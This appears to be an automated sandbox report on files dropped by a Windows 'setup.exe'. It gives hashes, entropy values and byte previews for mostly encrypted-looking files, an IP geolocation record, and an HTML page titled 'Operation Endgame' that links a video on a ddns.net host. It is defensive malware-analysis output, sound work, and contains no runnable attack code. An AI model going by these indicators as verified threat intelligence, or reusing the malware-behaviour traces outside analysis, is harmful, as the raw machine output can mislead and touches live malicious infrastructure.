              Size (bytes):358
              Entropy (8bit):7.288687042918391
              Encrypted:false
              SSDEEP:6:p5hujml92F9J61h76BXD4JaxBwKO0woNjsp2kzzGaUgacqrqWsXkNR2cii96Z:Lhffy9J6/7OAylO0woNjsp2atUTZJsMS
              MD5:A1A1C211BC685F1E8A6DD395F3843F49
              SHA1:36A14AFAC2FB2B5E65C3F7A71611A18829155B5F
              SHA-256:041EC4999160EC90D42D953945FB787262F4B45C20F2732B03E7A75A893418C3
              SHA-512:036180AB179F0DE51C4BCE8077E0D31AA2FD8C4A9D5F63AAAAF90A7F40E689C3341888B84F901BA42D9C7E1C1F94D1C6E1BE8BDAD6CFE2AE1EECEB9CDBEF8863
              Malicious:false
              Preview:CMMM .7...R.M..U.'..P%.t._<.DN...y#.....4..C...&hn.| .8|.f....u%D.>..h.Jv..^h..h'NM.....r.X..lX1|g..*..E..r.gb.....gq&E...U..tQ.........O;...f..ftq4.2...[...,.~......u.....e(.I......"...&~8.4@Y6.....s.}....3.x..O....:..%...l.....U.Yts..n:..jF.V..,s..E....A...}VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.297057049684732
              Encrypted:false
              SSDEEP:6:/4EEUiZjAjKm9chGPSOLZ093I/5uH6oY8CEllcwcxWsXkNR2cii96Z:/JKfmCsPSeZg3UuHPCEllcAsMR2cii9a
              MD5:0A391CCD67F5C9D4634C7728BED7F083
              SHA1:0A2D66EEA689A88C7E7173F3F1D06BDD51AF2083
              SHA-256:B4EA5B62920C8826A84AB9203385FE1619993786A07E02BAC954CBE1065FC4E5
              SHA-512:9A8A74277B3FC727B26BF84994DCDE554A6E8452E05DDAB2E76ED2C9CDA4E24098F5AB62430FE16797D4041CC3C368459A38555C68D45B3F26BD1A58FF5E2253
              Malicious:false
              Preview:CMMM ....(q..Kva#.j..@E.2..7....Yo.....+...P..^zL(.=6}.!... .....xTi..,_.Dd. .};..-..f..>w5z.n.L'....=.v.'.....j............k..n..>}..w.G..Q..O....9o.....t.Xi.ZkD.-....x..'.......#..f..i%..g.4Q..Z/.uB.i...+........F[^J.....gKI...?. @.....wl.<J.....7W..Q.?..".....|VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.287110900692635
              Encrypted:false
              SSDEEP:6:A7b3QzxQv7sixQph5+g+gB+iqihDXgHipPiEsBdlrnky+u8LuJ/GjMzAZfYqfz3Q:A7b3Qav7smivEnCpqEs/6ypT/Gj/fYqE
              MD5:7DD969932B831D24BD5BA4C315FF01B6
              SHA1:7AC3BD75E0F5C111709B26592AB2A497B8C67366
              SHA-256:EBB9B48AFEC1D6E25B8E39C76F6C8C68D872F9B41DDF0F295BB9A14007EA9424
              SHA-512:BF97FFE5500CF0C6D67729ED986389B3F6185BEDA04F6B65230D7D1396F3857B0B105FA82FA2583DCFCB00B7DCCB7265810D087D5EEA8E7146BF1F894FDCED7A
              Malicious:false
              Preview:CMMM C.m..>........>.d2.D.......{.pt.]5......F....-.K.*.._..9;..dW."z.....y...9..........9....>..QD.)..8...%.....!..xs....."......./.."..L..A"......^.............24YNc...^.....s%u.../..xD..W..".3a.D.....Y..E....}....Z7.I.^D@9l.%.4.8;.|.p...c.:.!..r....T.|.\.,(z..\.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:HTML document, ASCII text
              Category:dropped
              Size (bytes):437
              Entropy (8bit):3.8620388599907276
              Encrypted:false
              SSDEEP:6:hNSJL/0GMh63AEdhaA8SETEKVpnv0XVuzuBCcIPyiZTYFr1dtalAmXQGDf:h0qEdgjVpnv0FuOC5PBZTomjvb
              MD5:6910426A598BC0B07DD6CA7C2FAF5C22
              SHA1:4304D65A08652B167453997E1464CC6EF034BE23
              SHA-256:EBFEF207462C29030B8A06068C8CBF1CFEAE1304813B9CDBFA2D705B314BF692
              SHA-512:5E96757FA5DAA336968AA07D5FE5525040A081A547DD6BAD55BED4539AD76B3F96AABD38F461EFDAFA4A427963B2A3187CC40DFA60C74E6C6DDF738176381952
              Malicious:false
              Preview:<!DOCTYPE html>. <html>. <head>. <title>Operation Endgame</title>. </head>. <body>. <video playsinline autoplay muted loop height="auto" width=100%>. <source src="https://opendgame.ddns.net/endgame" type="video/webm">. Your browser does not support the video tag.. </video>. </body>. </html>.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):411
              Entropy (8bit):4.6420780896559455
              Encrypted:false
              SSDEEP:12:Yd9wpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdgHD+CtrRQVctrRQVzRZQ3htrRQV/m0
              MD5:EDCA7C5EAEC41C2D1880B6161721C8BE
              SHA1:9A650E1C3E6B7E8858A48D55F21C10C99EBE8AC8
              SHA-256:CADED2E85735BEB1518F1C907BB108B1DCD9C481DAD682B7E0A8E1009C541065
              SHA-512:2C39E15ADEAC90FB6D8F5F87B384F86A79E15F0582A4E8618C264FEE7223958E2F51AC5FA60001F95AE215351B677D91718E551DAB655B14F532556CC2D6AA7A
              Malicious:false
              Preview:{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:HTML document, ASCII text
              Category:dropped
              Size (bytes):437
              Entropy (8bit):3.8620388599907276
              Encrypted:false
              SSDEEP:6:hNSJL/0GMh63AEdhaA8SETEKVpnv0XVuzuBCcIPyiZTYFr1dtalAmXQGDf:h0qEdgjVpnv0FuOC5PBZTomjvb
              MD5:6910426A598BC0B07DD6CA7C2FAF5C22
              SHA1:4304D65A08652B167453997E1464CC6EF034BE23
              SHA-256:EBFEF207462C29030B8A06068C8CBF1CFEAE1304813B9CDBFA2D705B314BF692
              SHA-512:5E96757FA5DAA336968AA07D5FE5525040A081A547DD6BAD55BED4539AD76B3F96AABD38F461EFDAFA4A427963B2A3187CC40DFA60C74E6C6DDF738176381952
              Malicious:false
              Preview:<!DOCTYPE html>. <html>. <head>. <title>Operation Endgame</title>. </head>. <body>. <video playsinline autoplay muted loop height="auto" width=100%>. <source src="https://opendgame.ddns.net/endgame" type="video/webm">. Your browser does not support the video tag.. </video>. </body>. </html>.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):64281
              Entropy (8bit):7.997188214469122
              Encrypted:true
              SSDEEP:1536:Njzfwi0qWR015Ptq6Bl5Z3KIBxw6fn5vhVJf++:NfwfRm/Z35i6P5HJW+
              MD5:121D277FCA38249D87C8B0967F8B4F6C
              SHA1:231AA8D20E4CFDB277D3C1B3AC0869AB6BD1D1E3
              SHA-256:06B12FAE0C02DC6F21CDE89BA7F59DCBA1D987150265A6E950832E53F5EDC2A2
              SHA-512:B4FADA01EBD86E8BD41AEB1D706A520CC6FC8DBEE98447C2FD27181F5410802EC06585BF42E7E83CFBC7A987E01A5F41AE9355F374BD44C6AD509D8E391E3510
              Malicious:true
              Preview:<?xml..-.i.........W1....e-}...g._.`..Q,...hWB-....W.....a....N.K.$:....33.5s..d...hP>...3......w2d..*r.>Ib...".|<.6jw!Z.....9 p..Mi,.*M.]P.....<..p(....6.3....4.C-..#...%..`.....[.t\.-....a..ot......@`XVO.b.}.<..1i@_...U....~..7.S...S..w1.?..q..~...$k.m7.Qx.D..>i.MV.....{:....l.Z.p.";......&.5XOq..$..b.....`.7....y-m......p..n......R\.K.'.....E.W..z.|..OR.,".u..f.a..J...S...Tp..l0k..U.yL.i.....a... ...P[r....X......T..%+.L....Da.oO>.q.. .....!).&.-....yk...j..).cR.HO.Ox...> .Q...=Q..5..d..z...Z..$.e..e..Ad/..u....O'..s.E...'.......j..a3..z.h.W.3..2..<....Hu..Tmq.6Y.:.l....I..R.4`....gm..A.?..1<.....+.....\....;....{.].K../.p.V4....".7.qR...j.9.V..1...c.lkyx).../.\<z...c.>.r2(O..3....x.J6............G..$...An.>...6.L...=...Q..?&....F.b..&_{......A...QG.skx.....?....2.!j:..n..~2}.w...[.gs,.....V.=.u..`..6 ...4.....g&..@..A...].1./...C$..R.....9.v7.g..(....LX...i...w..)p}'9..Y..d..6../1...>.h..FI.2.-..o"..`.o......D...p.O....R....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977245490321764
              Encrypted:false
              SSDEEP:192:CgZBuUFR6LYvl4V6AaTtAgoRerFrw+Zfl8FDfVX5u3jHVgU+zTuCFK:JZsUr6Lsk6TigoumFDfV+z2zSCo
              MD5:E98A9841E29F7675BC228E5168D867BE
              SHA1:93CF98FFD037B971A231BD8569EF959DB2E9FF86
              SHA-256:FE64C5F42D0E6ABE9107862C92EB3EE37A425E8077B841AB4FB8F02C03F3BCE3
              SHA-512:C8AAF47559350829052B9DAD320AB6E451363F670493F2B35F50DD97A1D69A5337BBAF941F687E4832FEA07DF0B50B1386077E2FB7CBEA2F3613E1DD70796E93
              Malicious:false
              Preview:W......L..8..ZWd...W.(.Az.j...e..]....+2.....Rcb3....L.;.......NT...$....&....VB.v..}.._Q1..mK.T.......... ..W.67X.5.3...<4I.Yg............Gc.Q;....5...#]Z.)../.>..bUL~...R...b.Y..P...^h.HN..W:.evY0p..:.qZ[.....rr.0.p...}..2....X.6f..........h{....H.z.#D..s.2LVZc...MJk{.8..E.&.{../.L.w..AH....J.k.0.E....*.1i...w....c...Y(.p.....I.....)...#........T(}*.....\..$..4......K..b.k;....r....{G$...B...n.e..x.....0..h/..d\UX1.5.JvZ.sr>.i...h.e.....]H......xu... ..=....~.(.%a.....D2.c3.a...NU,..QgK90.].hC..g+...?....M..9..D............Db l..0B..T...~..[&Y...^..Q..@...v...V..-._...!...PTue$.>2.klL_.......V..~..D@.)u.r....EW.j.E..>..FW=L..V44.S....}..Z....M.x.H..8@...:M...^.w.?...."..2.......sC...x..W........}.,.....}&..>#........Z.)A1d..wL...&..z.f;..)`.f4l..u..o.......1...H..`$C...0..2M.....K.M..T..D.v}U(.O.r.c..G.66.&..9m..WN..U..N@]>....Xr.[.w..".7...s$......|./[&X..[VRj..|....T...46.J'....V.c.....5..1..#r..../.5...VQ...[k&....K...>I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.787484999169396
              Encrypted:false
              SSDEEP:6144:sw6MEqc4hcmudr20TP0AIE+5x6tToP5tXbltsR/IJ1S7EAe3sw1Xq6EPdqXfiWWy:sU4mMsD66UIB38qKhq
              MD5:D8F90836A8B1A424207A236114F95208
              SHA1:2F2891A6027E4F084952E8CCE81011C08C0D744B
              SHA-256:07588D461DAD38156F5FA8546E03C34CA95EE600FC5DAA4B1C571FD9B425A2D9
              SHA-512:4A23700B7AB9BF29EA572E9AFAA51A375BE8D65A642A55A4505881BDAD23B20D0DB4B4E2ECAAFCB3BD0041BF3A4CB8100C02CE5D863121130DD1FB2CB1B99C24
              Malicious:false
              Preview:..2].u.......G..?.y....... ...S..?.^..........,zT~...*Mt.2(}t.d..<>.*pj..x..0.Y.o;..%.NOM.J@...2...G.jU...W.t.u..B?pA..^..;.....5...l.'7..e.7J}?./p...24....vXO..`.7.W. .....Im....z.....rl...Aj.)s....F..H..n....KC9.0..^..zH.|.B..2}S.E\...l..9Yl.F..(.>p.....l...I--...i}V%..^F...'pI..3.|..D.Qt.*..I....o.....AB.\..b.(...}..8.#l@r....7n.,....$....n_5..0..!...Z>.4.yJP.gh..W..p......Cq).t..Bh...g..........|.`.......'.( +.hy.hZ..7...e.E.....e...p.Y.Ml.n$. ..<8.......1.4...S<VY..=|P...!.........nQpe...+/..]my.0..1:F4._......MV...n.vj.!....7...F5nd.z..P..{#../....y.....h....s.0...V.1.$...^,.......z..G8..M..Q..js:......o.\......4..ST..N.X%.!.5.:..4z.eg.i$p..w.....a60.D..|..}.P.)(~T.X..]+r...*.x..O....A..$0.S.A...9.......\oo]...Z=.......{.f.Yd....Cv.s7.J7p.s...p.D.....f.HC..../...[.UD......r3....H..xv.~." .a....I.....2.\.c0......:.^d.+vb..C.;~B..b^...a...A.|O.4.x....X(Cb3...........Qx.e.*..B.U.T3...{......%..T.-IV~e..pT[..g...9...7B..../...?v.|^....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.207974523809868
              Encrypted:false
              SSDEEP:6144:2SX3ZYfOknfK8nARF9Z88G3m0C/ntYY3X:2rvfGZtG3mNftYYn
              MD5:3FDF2604491180694584AE5B7A2CFDE9
              SHA1:05186BBFC5A91AE3826D6E5342F7C34CF1A9C27F
              SHA-256:C413F6493C11BA0DEA446FE218B6D2E08E0AADD942ED4F4266C386190353C552
              SHA-512:BEC0959BFDA58DF3216CCA13CB01A8382002DBA8D8C77331311BC65A484D1AFA91D7B7E174E798955E517BBCD087AFD079F719FEE5B3B8A24B56A3158D158147
              Malicious:false
              Preview:.......3.s.)l....HN...C.......1.9Bf.!..*..yt...w..c.1%R..bB........Rr..+E.J...z.d..K7(.q..w...k._.U.3..2....{.m..y,.u.\...y..B..'.`i3.[.Q....R.OlZ..<....E.6Zc.....r.N....1..q:93Nz..6T{..`..2J$y).4.....U..(..]l.\.YW_&.Y...\.....r.;.8...d..L.......@ ......R...Di.@.T.....|.)...J.d...&#.6..7u%.$.q./.B[.4.n......5..M.$..L........{&p...o..h.}...[M< .......:.."l$.a.....6.T.g..N.}gp*.'g%..s.-L.3..i/.k..5...m*+.....,@.....|........W....e....8:......Y..(..M....D..9..Z.7..j....V(=...).........d2K..... ..S.U..MOL...Z.bJ.1.+H......E.r...)..b..>dg....j.k.6.5....I.G....oU..>.+..6%vP.....z.......`...o..9..M,.i..k.v(d.v...C.p.Z..~.<.....2.{.......5.W.._...8..[..$...v.....v~...fLz.cy.{f.-..C...$..G.se4.[.....M1......3Zge<....Nkr...0...6.....E.'.R...0.%e;Yvu.q|..HP_u(f....T..v.(.....(.....`#;^E.}..D....../.....d.....: .n.K3{^mE]).G....U..4...,.+.1.3m..~Y.....14.2...`.....y..02.....O......,..|.o.E..Lj..o....]H.^9..P..X......l.....b............(........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2082316364807957
              Encrypted:false
              SSDEEP:3072:T8GfMdD/DthMqSeRZARpsULMwHOxtCRKWU9198oJM2N1U:jMdTDXMqLRZAReRrtCIWq3C2Nq
              MD5:D5669C6776F488DEE923CB6736F39700
              SHA1:FCA06C088E7633DB81E737B0C3C40AF4584F6440
              SHA-256:C76A8918FA79D970D0B3CBF5DD5D3DEA061BF9B25D700531B25EFAE6E4C2BE53
              SHA-512:95A82ED26A73B0CF69B4C0B810AC4EB2E74F9B9C9F9ED92FC16A74FCC780C24E5BB328F8A99D98FEAFF8AD37B470F82EFA9543E0309156F05E077C1D88B0E06D
              Malicious:false
              Preview:......g...6..a.E.j.)m..%8.~..B..9....~.Tz7...*..).;..!~. .....~'.NHHd*....V........,..^.....{.A......#uW........)D.|A.Q...x'.g.$R.5>....(...X.Y.#.R..n..V....z..(..,1...R.'..b.~.3..>......E....lu..15..QdL..w.Z........;h.5..ZQwxam....f....u>.>.Tj...1...G....3..}..C.pSBu1.......+..<.?.og#.@v.1.1U....a.r...CZ............t):....:P...J,..Z,..B.W.l/...J.%...tA.`..../.j....5.O..T.....3........-..p.9.X.Hd.uz...6..FYI*.m ...m]..fpwk..L..-.y../......r.x..D.%......=.p:..$......|3.....B..*Kk.y.....*......X..UO/Z.B/...OH.....y.4....."..7..........\.Zc;......vp.Kc.............J...Y[....@.u.;7..+*>...n....Mu}.e}d......s)~...x8.z.8...........Bf.g.P....d.-x.*..&cG..`.O..3.6..4(.).....{...+.TV@....G9..=}.........z...4..gXm7.e[..3.z.u&.....o.&.8.<GL..l....%..Dv.:.]o.t....=............3.H..}.S......|...O..a..\....F....X.g>O..0z.....l&..]_.K.uw...%...D$?M;.....v+.@X..(.P.s~0a.z.Q.i?.{..K..O:a.U.N.S.BS......9`.l.V..h.....1..Z.ob..R..... ^4.S.....#.g.T.I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.59268889632016
              Encrypted:false
              SSDEEP:6144:VfN3z8j8IQH0lo2muAsgrFflsvBxvqcnfxngsHIN0HTcAd+b67RG+rdsxQnZ:d93XH0l7mu3gx+/nni+Q+Z
              MD5:529BA41961016B7ECDEF7AD4AF6E7A5D
              SHA1:65065DC41E3911DB7F2F81E0748F8DFF608C345F
              SHA-256:FE4D06F85BBB9B38529AB539C7AE4B11BCF07517DB331E4E5A970EC122D45580
              SHA-512:FEFE42C7BADB16B13A849365014E24A421D1862269E1A339A39ED4D945CA75396970D03FE354F21083CB27C986D8E0BD774C0DDB38D6CA400BD7C54F9D9CB9E9
              Malicious:false
              Preview:\..............C ..W.......c...{..;..k......9.x.......E..8Q.EB.!....(...Nh..ps.W.g..+.Oc..W...n....Z...../n4.G...>..../.z+[F..E\........mZt.|.+.ho...F-.jSU... .{...(....Z[.uUR.|^y33sO\.'.>..<T..k%.v1&..a....'u.o .K.8...~..../.=uX.. p...).v....Flx...2k.A..<..j^z.`.o....Yt.q(..;....%.....@..P.1..j3(..@...F.P.1.:...c.8.,Lh..w..4.s.......Ar....zc...#l.@9..C>J..:....@....o.J.MB.......k....h.b..+..gT....7.X7...W...$.[...o.(..R6QS2w.......h..4.....h...Q.U.....H..;...Z..zS..1...i...4q..q$.E.5.y@.od..T....-..........(...9...O[...j..2...N..y.P....>.E..P..J...2v*..9........6..![_.q5.2...sDl......J\.)$X..)...=f..y]..JvXL.......F{.... .=. V...H_.U..N.t.S.k..y.R.U.G.D.c...yR...@{..;l.f..93...1.V_C....kD.GM..@...Q,.......|....T.>.<R......7.u.y.......?=*Lb.F...Y....?.C..*(..7~..........jA.g.I.qC~...n.HH.?l........g..F.5v..U_.9....@.-.X..]..9. 6u..@.....%b..&.m^...N.|..........Z..M..>w...1!7....p..Pe/........;....1..TTA6M.:.#8..3&gy.'.G.B.....!.....E(.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):20346
              Entropy (8bit):7.991276300685047
              Encrypted:true
              SSDEEP:384:nojzYMoifDFWo5p6P0f7EBOfXvnv/VULqYBsd3Nw8qPNfCrZggFrgkrRpob/:o4i8of6PqAcXnniLxO3NNqlo8IuT
              MD5:22F1828571E2842DE3E530A90DFA069B
              SHA1:7F21DEAD31A0E59567A30872584667C23975287D
              SHA-256:3174B18158F04451FB20ABD787232D1D4E51CE97680DC368884516396F3191F3
              SHA-512:35FFA160FC9FDDD800F698EC6AD3E45F2A1DFC35ED1DA753C15ACA726479755025E779D63F57A042AB1500EBEB724F11AE26C4F5121A0C4B4205946252358C6A
              Malicious:true
              Preview:......i...X....8......&......v8..v..o......+.y..U..--.T....E...F.......z....xaH.....i..Q=. X?......x...c..o.......*f..|..%.';.M....r....d..`....%./..{~....[.....F....'...j.b.r.,6.l5.:.z.T1.;..F.....w.......A..l.y.l...F...s`..;..U.4.....[f....]n.......U/......5U4l.mW.4..~:7SoZQ.zn...p......E..48...@-N+SY..y..e*#!.....;6R_.....^._]....6..\..rq..B...< r..?8I......EU.C|p..F...=]..T.H.5....].XtB.B.1ME0...W.d.&......f...$.\..y+..l.q.].c(..nT.m.M..o.0..~%....Ta4.n.j}0.hJ.f.;...^....c.!...Z.}.0.v..Le/.~.....{. .C.&(.s.sQ./.0..qrS.a....-.f.``..z.,2er..a.....!U....n.../r)....>j..7).|..t...;u..Zl.O.U..Sp..............S...h...N$..u..D.y.-...w....S.A.S...%^^Z.n.F.....;..!s............+r......!."..p..q......I....w&y.....Y.>.\*U.t..?..B..P..@..l....6..d.b..h..7....-".E.7{...W...\.....iT.!..ya....t..I.......m- ..>.g..M......8..xf\...H.%...S+...'.....$>.....f=..Ys......|....T.....T..s.....L.A..1..l..E.SU#..........j..~.35..o...a.xfr..Zp.2..+`dnhkg.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1583
              Entropy (8bit):7.8832001253857875
              Encrypted:false
              SSDEEP:48:YrPG+67S3uPLxweLQVIz+XgQUV+vAMWhwdD:X+6m3MfMc+Xy+YMWh8
              MD5:69CEE45755CDE678C013601627DAC964
              SHA1:8AFB6A1607FE0AEB2C4B4BFE4930E6C774A5D5C9
              SHA-256:24BB4D341CC9EE96CF6C463B97989934A8F7C4CFAEC32E8C8610503ED6150C67
              SHA-512:EC9459203A1DD029338B9516596D15C1C6CE7A8FB743ADDF3ADFAE0C3D0C997E892A46246FC459A63CEB5F78C2DE057DAF1BE6AA4C04B0B399F8D58F5F7FAA20
              Malicious:false
              Preview:{"spo....d.G...I..-..a..+....Wt..J......|L.*zs..vLxm.`.s.8....qD.\..|.fD...w1|7]...&.^$.<2Yb...........n.^.T+.h.....E....U.t..ij..E.HF...B.Y>...[.o.O.\..i.q......t...j..../x.=.E......F&......N..B.wa..+C.X.(%...\.X.......0.k.0 Z.2vp..DnT...Of....#..A....6&..D..&J..:.[..S....U.7..t.ST.C..3xL......l..\.. rA..>....js)"...0.o._.k..9.ma...E....R........jM.@^%...)}.5.@8.\....>%+..h>d..~...:j.l...O...K.m.u..l.-..&......$...N`.'.{Op}c .w.....?n...i.1..;,.$..W....,...U$.....`..i?`.`_..qzs..'....z.?.....s..v..Im..o...T.Q...r..}{2../..../....=r..&CS._..h&b.[.4DG~.EU.Z.E.,.....B..a".e...r.s...|..N.Y.r.].o.>..D...1T.vT=...y......Oe....^...&......g].k....p..........hv.d^=.q:{x.j.+.../......E..X.{.*%0..H.W..>.D...:......09._.E......u..hI.F..v.%F..QU..x.48.f..H<>..f......;.n...G...-y.O..."..p...=?....I.Y. ;l.X.."w.f.{,..:...m...NW|.J..mL...|.{~E....s\.+....-.R..bk.1.r.f.%|....sE..G...\.J...>..=50.<....:.?..E.O.I...bP.....;..plH...d...xB".=..-.%iUjx...i....+s.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:modified
              Size (bytes):7915
              Entropy (8bit):7.974468629418823
              Encrypted:false
              SSDEEP:96:qY4KIGu9VCFzAHRj/2vN+8HLXuJzR18nIQqhvuskzXrqbb57mUayBGhg/R5Ad3ng:NeZ2vNPLCPDT0XrabBZXsG/v+W1VYQX
              MD5:2AED773B8DED9590AA2486F2941FF449
              SHA1:04C192A64C62449BC894ED9585BAC2795D1CF1D2
              SHA-256:820F0BE31B64DCECC05CD14684510EE2C93725C1F256023D4355FA22ADFBE28C
              SHA-512:3150BD17807B2E3FFCEC9ED4474026D5524C13F8E7D97244134233ECC3D6A53B087394189682A8AF40192AC8FA6EBF9D43E6039D91C45603263388E454998C1D
              Malicious:false
              Preview:# Thi..T#.[..IG.Fz........\.....V.~.......,. ..^l...)........V>d.nx..m.y8_.:.F...do.K.s...B.P.x.I.F6........n}.....O.. .~...^........6k.T.a.N9.%...X.....h......1..Gr..yn..Q.;.j."Fo....P..~.n8F...i9jz;-.%..8b..[..<......kZ&....a^...Tn@Z....^~.g.vn..LRz=..4t.......-.:.F.#..)m...yvJT.{..m's^.<....H.;?5.,...s...~66.d.....M.).C&.....A?......,_.0.TH4...@^Q.y...+..;....o.*&.....\..\.P.*.wqH.n4...].%..Wz........L...\.UY.6.)We..k..|....E...D.x.r.L.2..,I X...y3J...2.@...kU.qx.$..dk.:!u.......e....{J.Mbi.....v....=...f.M.#.y..[p....v.CK.......?.){xC.F.|.@..........%.,H.44H../j'...o..Z...XJ.....d.C0..ao.X<e..d.U..=.A.....!]..M..KH......f.2....q...f.-20.'D.*G..b....z.a_.1E.a..'?..~...6=........-......O.[..i.......L..J-;....s......T....p..6...%s..P9.#.BH1*'}.g...`.......7.n...U....7.A...^.E......F..j2.D3.....Q.3../n....x.H<.8r....*....0!...b^r..J..].C.5..$....c..~.$...R.b....UD9....../..>.b~k2;..m.U,..n... ..!......n....DE..(..Q9i...... ..7...)..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977934107140513
              Encrypted:false
              SSDEEP:192:LHQHxum+E+ZlwawJc7S/nrSeKY/wa77J5Pzt7/2ONLZ4A:zQHxoVl3wImFKYd5zt7/5tT
              MD5:F7C036C0838A04BE198B5616576F192D
              SHA1:8E48F89839149A12A0815196D139366C26B0EE95
              SHA-256:513DE10F06FF5A8238347C62F7E52016E79A179E06A9AA288F1BC4671964E653
              SHA-512:FB29B66A74CCF15403B6D4AC62901BB74944AAC9DB90356CB781792CF7DDA12F596217A41D6B7363DABB2F4F527CAC75E6600164B443E5548FE15BAA9C1A4E6B
              Malicious:false
              Preview:regf.Z..."".1.\. ...j?g..P.......q.+.W...wh.?.)\./u+..."..je.....m.,DC\..]......FJPPK...#Q%.........7C......+73.@...[i.....=O.a\.N.......%bq..C...C.G.#$......}...%..?..Y..{...yo.?.2....V...{9u..l..N....j.pX.%.`Q....."*.X+....;...-5.2.g..w0... ...f*.L...Z..[M.s.y@c.E.B7....(....ju`".....S1....x...G`.Ci....'P`..M...D..48D..~...&*........(....J..QlW,..I].s.....F..... .....J.jnX.F..H.Z.r].&...U)R...J5.~...n....!..#H .J.........U.g...D..^..]..A..v.j.pb........J..c.9......e1W..N....;a.%...q=..;H.....r.S..K..uu....RE.*....e..\....u.FcA..w)..Tm~B...$..V..?.U...pA....=N........E.k..Pu...o.c3...F.qM.G......(..A... g!..+@..j....gy.n....}.vDI..I..l.[. .F.t.w.%.xS...)pM....-{....Ss....D..on....ySY. .R...R7.....S.....V....{.p).........e.......&#2.C......Z.......N.aS6!uw.o"Q*......*~.AY.....*.b.....0....P..G..7.-h*.r.V.W:...+YB.KA.......H.t.P.k.0R_..ov.}]...Z..e.2..V....3.;..M.e..Zo..4Pr..<..{.Q..|V.G.M@.*M...8R".=Fl...."M...&......U9.(U...&.Z.%6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97874440053921
              Encrypted:false
              SSDEEP:192:97nkCQsMbkH2pVU3xGCyQ7U2nsCObHmGhDVDWDHsRKNnax2h:NbQsdfBTQ2sX6o2MKNnR
              MD5:7386198E40DB682295D60CC50E46249C
              SHA1:C3AC15DF539A6AB6D9A48F514C18EF02857A9550
              SHA-256:B231EBF334F428D17D57CFC120FE82EDBABEA77A55B6A19466FB0C3105AA61E0
              SHA-512:BB21A9FDF7FEB99889D06D7C54775E2CA8B1BE1D778E80122DF5E6A6D02CF886921733E7BD1493EBBFD13F1F3E30D8E4B65BB767C9584E624DD9749885948D34
              Malicious:false
              Preview:regf......./H..Z..I.....w.x*,.....@.&u..&V.kaRc..}.h..RPoH...$>..I.h..ZL..PN..0/L...h!".xY'.&4.N....E.u.n..Uya.....f.T4...^..2E[(..kh......+.x6...9t.S..q....#...t.}^cT.J..3dpc..N......T..=.......o7.+._.....VH.]......+.*.....z..=9.'F..K..%(a..z>.D..F.l.1.QWZ..G.4...&.9)..{.H..DU..It_%....B.../..J.,.......I.Zz..K.g.PL..t.....Z..\?.|. ..K.%Y...d...Y..c+..;.......,.o.dp..]..VR.6%B.....B.G#..5O.8s./.9$ni......#.M....]\uU.....l..N.|.7.C.....5T,..w...]......S...)....Mn5w3...7~.Uue....-.V.Z...p.R.$.O..>...R....cf.... Y.Xg.....;t.Z._..Ds..Ww...gU.Ijw.<...G..U*..<.{.....;.....U2.y$.^.......Eq..e.......;.x.`..&.H.-....w....![.*3X.'.Ug...E.......$,...d+..[G.^i.....BVMa..xE..W9f.}.....j..M.....WZ................U.Kr.U..t....E........^t..\j.Cb...A.......l&.4...^...feMc.yT..b...K.h8...m.xYeR.; j=...1.{%D..h...Qs.Ld.\.......G..u.Y.Pqt.t...Q.Ym..6.g..>l[.U.tr*3.l..K0#....|...s.x'..H0..-._...&.[.I.A?......j.b..H.U>......Y\.^..j.F.0Y.s..4g.!l......6......%..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976825936582029
              Encrypted:false
              SSDEEP:192:fTm+wZ3FgJqAEOs+BW5OTq/HoTeP0ckdlOh5xoTwzGcb4dvAxRP:fS+2SEOB89PL8lOhsMF4OXP
              MD5:937F49F1ECB25FFA408154E8F4B52B9F
              SHA1:ABF607E129CFEBA8586229595B5F4F7E2FA2F4F5
              SHA-256:483A79FCFF01A0357552A83D186E9A6D887CAECB622BA4A17F0BC93D6F3C12D2
              SHA-512:61BAD7D36D3EF39BE8D020C51D900152811DAA299CD657DF9F641655E9FE0C836A4CBD52E9DFEB05392A4D2427D4BE80C8E709922E6D5386D811E16C4AB175F2
              Malicious:false
